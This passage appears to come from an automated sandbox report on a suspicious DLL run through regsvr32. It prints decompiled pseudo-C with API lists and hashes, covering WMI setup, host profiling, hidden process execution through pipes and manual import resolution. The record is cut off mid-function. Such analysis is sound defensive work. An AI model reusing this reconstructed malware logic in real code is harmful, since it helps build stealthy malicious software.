                                          • String ID: @$\u%04X$\u%04X\u%04X
                                          • API String ID: 0-2132903582
                                          • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                          • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                                          • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                          • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E1000D523(void* __ecx) {
                                          				char _v8;
                                          				void* _v12;
                                          				char* _t15;
                                          				intOrPtr* _t16;
                                          				void* _t21;
                                          				intOrPtr* _t23;
                                          				intOrPtr* _t24;
                                          				intOrPtr* _t25;
                                          				void* _t30;
                                          				void* _t33;
                                          
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                          				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                          				_t15 =  &_v12;
                                          				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
                                          				if(_t15 < 0) {
                                          					L5:
                                          					_t23 = _v8;
                                          					if(_t23 != 0) {
                                          						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                          					}
                                          					_t24 = _v12;
                                          					if(_t24 != 0) {
                                          						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                          					}
                                          					_t16 = 0;
                                          				} else {
                                          					__imp__#2(__ecx);
                                          					_t25 = _v12;
                                          					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                          					if(_t21 < 0) {
                                          						goto L5;
                                          					} else {
                                          						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                          						if(_t21 < 0) {
                                          							goto L5;
                                          						} else {
                                          							_t16 = E10008604(8);
                                          							if(_t16 == 0) {
                                          								goto L5;
                                          							} else {
                                          								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                          								 *_t16 = _v8;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t16;
                                          			}


                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                                          • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                                          • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                                          • String ID:
                                          • API String ID: 2855449287-0
                                          • Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                                          • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                                          • Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                                          • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E100121FF(char* __eax, char** _a4, long long* _a8) {
                                          				char* _v8;
                                          				long long _v16;
                                          				char* _t9;
                                          				signed char _t11;
                                          				char** _t19;
                                          				char _t22;
                                          				long long _t32;
                                          				long long _t33;
                                          
                                          				_t9 = __eax;
                                          				L100122CD();
                                          				_t19 = _a4;
                                          				_t22 =  *__eax;
                                          				if( *_t22 != 0x2e) {
                                          					_t9 = strchr( *_t19, 0x2e);
                                          					if(_t9 != 0) {
                                          						 *_t9 =  *_t22;
                                          					}
                                          				}
                                          				L10012291();
                                          				 *_t9 =  *_t9 & 0x00000000;
                                          				_t11 = strtod( *_t19,  &_v8);
                                          				asm("fst qword [ebp-0xc]");
                                          				_t32 =  *0x10018250;
                                          				asm("fucomp st1");
                                          				asm("fnstsw ax");
                                          				if((_t11 & 0x00000044) != 0) {
                                          					L5:
                                          					st0 = _t32;
                                          					L10012291();
                                          					if( *_t11 != 0x22) {
                                          						_t33 = _v16;
                                          						goto L8;
                                          					} else {
                                          						return _t11 | 0xffffffff;
                                          					}
                                          				} else {
                                          					_t33 =  *0x10018258;
                                          					asm("fucomp st1");
                                          					asm("fnstsw ax");
                                          					if((_t11 & 0x00000044) != 0) {
                                          						L8:
                                          						 *_a8 = _t33;
                                          						return 0;
                                          					} else {
                                          						goto L5;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _errno$localeconvstrchrstrtod
                                          • String ID:
                                          • API String ID: 1035490122-0
                                          • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                          • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                                          • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                          • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E1000CF84(void* __ecx) {
                                          				intOrPtr _t11;
                                          				long _t12;
                                          				intOrPtr _t17;
                                          				intOrPtr _t18;
                                          				struct _OSVERSIONINFOA* _t29;
                                          
                                          				_push(__ecx);
                                          				_t29 =  *0x1001e688; // 0x1820590
                                          				GetCurrentProcess();
                                          				_t11 = E1000BA05();
                                          				_t1 = _t29 + 0x1644; // 0x1821bd4
                                          				_t25 = _t1;
                                          				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                          				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                          				_t33 = _t12;
                                          				if(_t12 != 0) {
                                          					_t12 = E10008FBE(_t25, _t33);
                                          				}
                                          				_t3 = _t29 + 0x228; // 0x18207b8
                                          				 *(_t29 + 0x1854) = _t12;
                                          				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
                                          				memset(_t29, 0, 0x9c);
                                          				_t29->dwOSVersionInfoSize = 0x9c;
                                          				GetVersionExA(_t29);
                                          				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                          				_t17 = E1000E3B6(_t3);
                                          				_t7 = _t29 + 0x220; // 0x18207b0
                                          				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                          				_t18 = E1000E3F1(_t7);
                                          				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                          				return _t18;
                                          			}

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,01820590,?,10003545), ref: 1000CF90
                                          • GetModuleFileNameW.KERNEL32(00000000,01821BD4,00000105,?,?,01820590,?,10003545), ref: 1000CFB1
                                          • memset.MSVCRT ref: 1000CFE2
                                          • GetVersionExA.KERNEL32(01820590,01820590,?,10003545), ref: 1000CFED
                                          • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess$FileModuleNameVersionmemset
                                          • String ID:
                                          • API String ID: 3581039275-0
                                          • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                                          • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                                          • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                                          • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E1000A9B7(signed int __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				struct _SECURITY_ATTRIBUTES _v48;
                                          				intOrPtr _v60;
                                          				char _v64;
                                          				intOrPtr _v76;
                                          				intOrPtr _v80;
                                          				void* _v84;
                                          				short _v92;
                                          				intOrPtr _v96;
                                          				void _v140;
                                          				intOrPtr _t77;
                                          				void* _t79;
                                          				intOrPtr _t85;
                                          				intOrPtr _t87;
                                          				intOrPtr _t89;
                                          				intOrPtr _t92;
                                          				intOrPtr _t98;
                                          				intOrPtr _t100;
                                          				intOrPtr _t102;
                                          				long _t111;
                                          				intOrPtr _t115;
                                          				intOrPtr _t126;
                                          				void* _t127;
                                          				void* _t128;
                                          				void* _t129;
                                          				void* _t130;
                                          
                                          				_t111 = 0;
                                          				_v24 = __ecx;
                                          				_v12 = 0;
                                          				_v20 = 0;
                                          				_t127 = 0;
                                          				_v8 = 0;
                                          				_v16 = 0;
                                          				_v48.nLength = 0xc;
                                          				_v48.lpSecurityDescriptor = 0;
                                          				_v48.bInheritHandle = 1;
                                          				_v28 = 0;
                                          				memset( &_v140, 0, 0x44);
                                          				asm("stosd");
                                          				_t130 = _t129 + 0xc;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                          					L13:
                                          					E1000861A( &_v28, 0);
                                          					if(_v20 != 0) {
                                          						_t77 =  *0x1001e684; // 0x189faa0
                                          						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                          					}
                                          					if(_v8 != 0) {
                                          						_t115 =  *0x1001e684; // 0x189faa0
                                          						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                          					}
                                          					return _t111;
                                          				}
                                          				_t79 = _v16;
                                          				_v76 = _t79;
                                          				_v80 = _t79;
                                          				_v84 = _v12;
                                          				_v140 = 0x44;
                                          				_v96 = 0x101;
                                          				_v92 = 0;
                                          				_t126 = E10008604(0x1001);
                                          				_v28 = _t126;
                                          				if(_t126 == 0) {
                                          					goto L18;
                                          				}
                                          				_push( &_v64);
                                          				_push( &_v140);
                                          				_t85 =  *0x1001e684; // 0x189faa0
                                          				_push(0);
                                          				_push(0);
                                          				_push(0x8000000);
                                          				_push(1);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_v24);
                                          				_push(0);
                                          				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                          					goto L13;
                                          				}
                                          				_t87 =  *0x1001e684; // 0x189faa0
                                          				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                          				_t89 =  *0x1001e684; // 0x189faa0
                                          				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                          				_v24 = _v24 & 0;
                                          				do {
                                          					_t92 =  *0x1001e684; // 0x189faa0
                                          					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                          					 *((char*)(_v24 + _t126)) = 0;
                                          					if(_t111 == 0) {
                                          						_t127 = E100091A6(_t126, 0);
                                          					} else {
                                          						_push(0);
                                          						_push(_t126);
                                          						_v32 = _t127;
                                          						_t127 = E10009292(_t127);
                                          						E1000861A( &_v32, 0xffffffff);
                                          						_t130 = _t130 + 0x14;
                                          					}
                                          					_t111 = _t127;
                                          					_v32 = _t127;
                                          				} while (_v36 != 0);
                                          				_push( &_v36);
                                          				_push(E1000C379(_t127));
                                          				_t98 =  *0x1001e68c; // 0x189fc68
                                          				_push(_t127);
                                          				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                          					L12:
                                          					_t100 =  *0x1001e684; // 0x189faa0
                                          					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                          					_t102 =  *0x1001e684; // 0x189faa0
                                          					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                          					goto L13;
                                          				}
                                          				_t128 = E10009256(_t127);
                                          				if(_t128 == 0) {
                                          					goto L12;
                                          				}
                                          				E1000861A( &_v32, 0);
                                          				return _t128;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 1000A9F4
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                                          • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                            • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateHeapPipe$AllocFreememset
                                          • String ID: D
                                          • API String ID: 488076629-2746444292
                                          • Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                                          • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                                          • Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                                          • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E1001249B(signed int __eax, intOrPtr _a4) {
                                          				intOrPtr* _v8;
                                          				signed int* _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				intOrPtr _v32;
                                          				struct HINSTANCE__* _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				struct HINSTANCE__* _v48;
                                          				intOrPtr _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _t109;
                                          				signed int _t112;
                                          				signed int _t115;
                                          				void* _t163;
                                          
                                          				_v44 = _v44 & 0x00000000;
                                          				if(_a4 != 0) {
                                          					_v48 = GetModuleHandleA("kernel32.dll");
                                          					_v40 = E1000E099(_v48, "GetProcAddress");
                                          					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                          					_v32 = _v52;
                                          					_t109 = 8;
                                          					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                          						L24:
                                          						return 0;
                                          					}
                                          					_v56 = 0x80000000;
                                          					_t112 = 8;
                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                          						_v8 = _v8 + 0x14;
                                          					}
                                          					_t115 = 8;
                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                          						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
                                          						if(_v36 != 0) {
                                          							if( *_v8 == 0) {
                                          								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                          							} else {
                                          								_v12 =  *_v8 + _a4;
                                          							}
                                          							_v28 = _v28 & 0x00000000;
                                          							while( *_v12 != 0) {
                                          								_v24 = _v24 & 0x00000000;
                                          								_v16 = _v16 & 0x00000000;
                                          								_v64 = _v64 & 0x00000000;
                                          								_v20 = _v20 & 0x00000000;
                                          								if(( *_v12 & _v56) == 0) {
                                          									_v60 =  *_v12 + _a4;
                                          									_v20 = _v60 + 2;
                                          									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                          									_v16 = _v40(_v36, _v20);
                                          								} else {
                                          									_v24 =  *_v12;
                                          									_v20 = _v24 & 0x0000ffff;
                                          									_v16 = _v40(_v36, _v20);
                                          								}
                                          								if(_v24 != _v16) {
                                          									_v44 = _v44 + 1;
                                          									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                          										 *_v12 = _v16;
                                          									} else {
                                          										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                          									}
                                          								}
                                          								_v12 =  &(_v12[1]);
                                          								_v28 = _v28 + 4;
                                          							}
                                          							_v8 = _v8 + 0x14;
                                          							continue;
                                          						}
                                          						_t163 = 0xfffffffd;
                                          						return _t163;
                                          					}
                                          					goto L24;
                                          				}
                                          				return __eax | 0xffffffff;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                                          • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID: GetProcAddress$kernel32.dll
                                          • API String ID: 4133054770-1584408056
                                          • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                                          • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                                          • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                                          • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                          				char _v8;
                                          				char _v12;
                                          				void _v140;
                                          				signed char _t14;
                                          				char _t15;
                                          				intOrPtr _t20;
                                          				void* _t25;
                                          				intOrPtr _t26;
                                          				intOrPtr _t32;
                                          				WCHAR* _t34;
                                          				intOrPtr _t35;
                                          				struct HINSTANCE__* _t37;
                                          				int _t38;
                                          				intOrPtr _t46;
                                          				void* _t47;
                                          				intOrPtr _t50;
                                          				void* _t60;
                                          				void* _t61;
                                          				char _t62;
                                          				char* _t63;
                                          				void* _t65;
                                          				intOrPtr _t66;
                                          				char _t68;
                                          
                                          				_t65 = __esi;
                                          				_t61 = __edi;
                                          				_t47 = __ebx;
                                          				_t50 =  *0x1001e688; // 0x1820590
                                          				_t14 =  *(_t50 + 0x1898);
                                          				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                          					_t15 = E100095E1(_t50, 0xb62);
                                          					_t66 =  *0x1001e688; // 0x1820590
                                          					_t62 = _t15;
                                          					_t67 = _t66 + 0xb0;
                                          					_v8 = _t62;
                                          					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
                                          					_t20 =  *0x1001e688; // 0x1820590
                                          					asm("sbb eax, eax");
                                          					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                          					_t63 = "\\";
                                          					_t26 =  *0x1001e688; // 0x1820590
                                          					_t68 = E100092E5(_t26 + 0x1020);
                                          					_v12 = _t68;
                                          					E100085D5( &_v8);
                                          					_t32 =  *0x1001e688; // 0x1820590
                                          					_t34 = E100092E5(_t32 + 0x122a);
                                          					 *0x1001e784 = _t34;
                                          					_t35 =  *0x1001e684; // 0x189faa0
                                          					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                          					_t37 = LoadLibraryW( *0x1001e784);
                                          					 *0x1001e77c = _t37;
                                          					if(_t37 == 0) {
                                          						_t38 = 0;
                                          					} else {
                                          						_push(_t37);
                                          						_t60 = 0x28;
                                          						_t38 = E1000E171(0x1001bb48, _t60);
                                          					}
                                          					 *0x1001e780 = _t38;
                                          					E1000861A( &_v12, 0xfffffffe);
                                          					memset( &_v140, 0, 0x80);
                                          					if( *0x1001e780 != 0) {
                                          						goto L10;
                                          					} else {
                                          						E1000861A(0x1001e784, 0xfffffffe);
                                          						goto L8;
                                          					}
                                          				} else {
                                          					L8:
                                          					if( *0x1001e780 == 0) {
                                          						_t46 =  *0x1001e6bc; // 0x189fbc8
                                          						 *0x1001e780 = _t46;
                                          					}
                                          					L10:
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoadmemset
                                          • String ID: %08x$dll
                                          • API String ID: 3406617148-2963171978
                                          • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                                          • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                                          • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                                          • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E10012D70(int _a4, signed int _a8) {
                                          				int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void* __esi;
                                          				void* _t137;
                                          				signed int _t141;
                                          				intOrPtr* _t142;
                                          				signed int _t145;
                                          				signed int _t146;
                                          				intOrPtr _t151;
                                          				intOrPtr _t161;
                                          				intOrPtr _t162;
                                          				intOrPtr _t167;
                                          				intOrPtr _t170;
                                          				signed int _t172;
                                          				intOrPtr _t173;
                                          				int _t184;
                                          				intOrPtr _t185;
                                          				intOrPtr _t188;
                                          				signed int _t189;
                                          				void* _t195;
                                          				int _t202;
                                          				int _t208;
                                          				intOrPtr _t217;
                                          				signed int _t218;
                                          				int _t219;
                                          				intOrPtr _t220;
                                          				signed int _t221;
                                          				signed int _t222;
                                          				int _t224;
                                          				int _t225;
                                          				signed int _t227;
                                          				intOrPtr _t228;
                                          				int _t232;
                                          				int _t234;
                                          				signed int _t235;
                                          				int _t239;
                                          				void* _t240;
                                          				int _t245;
                                          				int _t252;
                                          				signed int _t253;
                                          				int _t254;
                                          				void* _t257;
                                          				void* _t258;
                                          				int _t259;
                                          				intOrPtr _t260;
                                          				int _t261;
                                          				signed int _t269;
                                          				signed int _t271;
                                          				intOrPtr* _t272;
                                          				void* _t273;
                                          
                                          				_t253 = _a8;
                                          				_t272 = _a4;
                                          				_t3 = _t272 + 0xc; // 0x452bf84d
                                          				_t4 = _t272 + 0x2c; // 0x8df075ff
                                          				_t228 =  *_t4;
                                          				_t137 =  *_t3 + 0xfffffffb;
                                          				_t229 =  <=  ? _t137 : _t228;
                                          				_v16 =  <=  ? _t137 : _t228;
                                          				_t269 = 0;
                                          				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                          				asm("o16 nop [eax+eax]");
                                          				while(1) {
                                          					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                                          					_t141 =  *_t8 + 0x2a >> 3;
                                          					_v12 = 0xffff;
                                          					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                          					if(_t217 < _t141) {
                                          						break;
                                          					}
                                          					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                          					_t12 = _t272 + 0x5c; // 0x84e85000
                                          					_t245 =  *_t11 -  *_t12;
                                          					_v8 = _t245;
                                          					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                          					_t247 =  <  ? _t195 : _v12;
                                          					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                          					if(_t227 >= _v16) {
                                          						L7:
                                          						if(_t253 != 4) {
                                          							L10:
                                          							_t269 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t285 = _t227 - _t195;
                                          							if(_t227 != _t195) {
                                          								goto L10;
                                          							} else {
                                          								_t269 = _t253 - 3;
                                          							}
                                          						}
                                          						E10015D90(_t272, _t272, 0, 0, _t269);
                                          						_t18 = _t272 + 0x14; // 0xc703f045
                                          						_t19 = _t272 + 8; // 0x8d000040
                                          						 *( *_t18 +  *_t19 - 4) = _t227;
                                          						_t22 = _t272 + 0x14; // 0xc703f045
                                          						_t23 = _t272 + 8; // 0x8d000040
                                          						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                          						_t26 = _t272 + 0x14; // 0xc703f045
                                          						_t27 = _t272 + 8; // 0x8d000040
                                          						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                          						_t30 = _t272 + 0x14; // 0xc703f045
                                          						_t31 = _t272 + 8; // 0x8d000040
                                          						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                          						E10014AF0(_t285,  *_t272);
                                          						_t202 = _v8;
                                          						_t273 = _t273 + 0x14;
                                          						if(_t202 != 0) {
                                          							_t208 =  >  ? _t227 : _t202;
                                          							_v8 = _t208;
                                          							_t36 = _t272 + 0x38; // 0xf47d8bff
                                          							_t37 = _t272 + 0x5c; // 0x84e85000
                                          							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                          							_t273 = _t273 + 0xc;
                                          							_t252 = _v8;
                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                          							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                          							_t227 = _t227 - _t252;
                                          						}
                                          						if(_t227 != 0) {
                                          							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
                                          							_t273 = _t273 + 0xc;
                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                          						}
                                          						_t253 = _a8;
                                          						if(_t269 == 0) {
                                          							continue;
                                          						}
                                          					} else {
                                          						if(_t227 != 0 || _t253 == 4) {
                                          							if(_t253 != 0 && _t227 == _t195) {
                                          								goto L7;
                                          							}
                                          						}
                                          					}
                                          					break;
                                          				}
                                          				_t142 =  *_t272;
                                          				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                          				_a4 = _t232;
                                          				if(_t232 == 0) {
                                          					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                          					_t254 =  *_t83;
                                          				} else {
                                          					_t59 = _t272 + 0x2c; // 0x8df075ff
                                          					_t224 =  *_t59;
                                          					if(_t232 < _t224) {
                                          						_t65 = _t272 + 0x3c; // 0x830cc483
                                          						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                          						_t260 =  *_t66;
                                          						__eflags =  *_t65 - _t260 - _t232;
                                          						if( *_t65 - _t260 <= _t232) {
                                          							_t67 = _t272 + 0x38; // 0xf47d8bff
                                          							_t261 = _t260 - _t224;
                                          							 *(_t272 + 0x6c) = _t261;
                                          							memcpy( *_t67,  *_t67 + _t224, _t261);
                                          							_t70 = _t272 + 0x16b0; // 0xdf750008
                                          							_t188 =  *_t70;
                                          							_t273 = _t273 + 0xc;
                                          							_t232 = _a4;
                                          							__eflags = _t188 - 2;
                                          							if(_t188 < 2) {
                                          								_t189 = _t188 + 1;
                                          								__eflags = _t189;
                                          								 *(_t272 + 0x16b0) = _t189;
                                          							}
                                          						}
                                          						_t73 = _t272 + 0x38; // 0xf47d8bff
